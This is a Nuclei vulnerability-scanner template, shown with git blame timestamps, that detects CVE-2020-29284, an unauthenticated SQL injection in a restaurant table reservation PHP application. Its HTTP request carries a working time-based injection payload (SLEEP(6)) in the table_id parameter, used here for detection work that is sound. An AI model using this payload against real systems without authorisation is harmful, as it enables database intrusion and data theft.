nuclei-templates/http/cves/2020/CVE-2020-29284.yaml

53 lines
2.1 KiB
YAML
Raw Normal View History

2022-09-30 17:18:41 +00:00
id: CVE-2020-29284
info:
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
2022-09-30 17:18:41 +00:00
author: edoardottt
severity: critical
description: |
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0.
2022-09-30 17:18:41 +00:00
reference:
- https://www.exploit-db.com/exploits/48984
2022-11-15 12:20:07 +00:00
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
2023-07-11 19:49:27 +00:00
- https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html
2022-09-30 17:18:41 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-09-30 17:18:41 +00:00
cve-id: CVE-2020-29284
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.04855
2023-10-14 11:27:55 +00:00
epss-percentile: 0.91843
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:*
2022-11-15 12:20:07 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:22:36 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: multi_restaurant_table_reservation_system_project
product: multi_restaurant_table_reservation_system
tags: cve2020,tablereservation,sqli,unauth,edb,cve
2022-09-30 17:18:41 +00:00
http:
2022-09-30 17:18:41 +00:00
- method: GET
path:
2022-11-15 12:20:07 +00:00
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
2022-09-30 17:18:41 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
2022-11-15 12:20:07 +00:00
- 'duration>=6'
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
2022-09-30 17:18:41 +00:00
- type: status
status:
2022-11-15 12:20:07 +00:00
- 200